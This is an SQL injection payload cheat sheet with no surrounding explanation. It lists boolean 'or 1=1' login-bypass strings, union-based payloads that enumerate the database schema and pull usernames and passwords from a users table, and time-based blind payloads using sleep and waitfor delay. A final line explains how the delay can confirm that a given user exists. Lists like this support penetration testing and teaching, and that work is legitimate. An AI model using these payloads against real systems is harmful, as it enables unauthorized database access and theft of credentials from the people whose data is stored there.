or 1=1
or 1=1-- -
or 1=1-- - //
or 1=1#
or 1=1/
' or 1=1
' or 1=1-- -
' or 1=1#
' or 1=1/
' or 1=1-- - //
' or 1=1 in (select @@version)-- - //
' or 1=1 in (select * from users)-- -//
' or 1=1 in (select passwords from users)-- -//
' or 1=1 in (select password from users where username = 'admin') -- //
Union based
' order by 1-- -
' order by 1-- //
' union select database(), user(), @@version, null, null -- // <-- 5 columns
' union select null, table_name, column_name, table_schema, null from information_schema.columns where table_schema=database() -- //
' union select null, username, password, description, null from users -- //
Blind SQLi
1 or sleep(5)#
1 or sleep 5-- -
1 or sleep 5--
1 or sleep (5-)-
' or sleep(5)-- -
" or sleep(5)="
' or sleep(5)='
'waitfor delay '0:0:5'--
;waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
' AND IF (1=1, sleep(3), 'false') -- -
' AND IF (1=1, sleep(3), 'false') -- //
If the query is looking a specific user we can append the payload and if it hangs for 3 seconds that means that the user exists
